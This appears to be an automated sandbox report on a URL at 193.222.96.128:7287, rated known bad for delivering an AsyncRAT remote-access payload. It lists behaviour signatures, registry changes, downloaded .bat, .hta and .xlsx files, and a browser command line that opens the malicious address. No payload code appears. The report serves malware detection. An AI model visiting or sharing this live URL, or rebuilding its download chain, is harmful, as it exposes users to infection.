Analysis Overview
Threat Level: Known bad
The file http://193.222.96.128:7287/ was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Blocklisted process makes network request
Checks computer location settings
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Modifies registry class
NTFS ADS
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-19 15:57
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-19 15:57
Reported
2024-04-19 16:03
Platform
win10v2004-20240412-en
Max time kernel
300s
Max time network
304s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\Downloads\15.bat:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\index.hta:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\index(1).hta:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\GoGi.bat:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\jiteon.xlsx:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.128:7287/"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://193.222.96.128:7287/
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.0.748411504\861399078" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1796 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {27fccf99-4260-425d-99f6-3f24e5d01725} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 1884 2e29c70ea58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.1.138431360\1987171567" -parentBuildID 20230214051806 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {890110b5-bc17-4d2c-bc1c-e31324d6da70} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 2476 2e288489058 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.2.40416309\731482835" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f8a09c5-4824-4734-ac39-70b52d034736} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3076 2e29f63e558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.3.1814357587\895428089" -childID 2 -isForBrowser -prefsHandle 3872 -prefMapHandle 3868 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c418a55c-6c1d-41a8-bf3e-7ffa99b591ac} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3884 2e28847ae58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.4.1950139730\442656087" -childID 3 -isForBrowser -prefsHandle 5156 -prefMapHandle 5152 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e511be1-32c8-4cc2-847d-6c9ff30d630d} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5004 2e2a296b258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.5.1027841266\366751635" -childID 4 -isForBrowser -prefsHandle 5172 -prefMapHandle 5176 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e45dafc5-ff67-410a-a601-1032514c435c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5308 2e2a30cc758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.6.495439415\1688938685" -childID 5 -isForBrowser -prefsHandle 5568 -prefMapHandle 5564 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e1c3b01-a8c7-4a97-9079-375a14f935da} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5484 2e2a30cd058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.7.849901555\1470011006" -childID 6 -isForBrowser -prefsHandle 5244 -prefMapHandle 5208 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf25254b-b9f7-4fd9-a7d9-194410428f3c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5232 2e2a4158758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.8.1396890668\1422348576" -childID 7 -isForBrowser -prefsHandle 5456 -prefMapHandle 5460 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {936b04b0-ee0c-4157-b1c5-4c852db4e4c6} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5932 2e29e8c3b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.9.2007607417\154283277" -childID 8 -isForBrowser -prefsHandle 4608 -prefMapHandle 3564 -prefsLen 27737 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60d765d3-345c-41aa-9b77-e00a0c6f9513} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 1540 2e29e629d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.10.131863300\526272546" -childID 9 -isForBrowser -prefsHandle 6476 -prefMapHandle 6472 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f0d99e0-3fc9-4558-af31-b6884fcaa9b5} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6488 2e2a4b95358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.11.1475847541\2054531302" -childID 10 -isForBrowser -prefsHandle 6736 -prefMapHandle 6732 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54cc6389-6d2a-4122-b527-e49c3cbbb04f} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6708 2e2a5b09058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
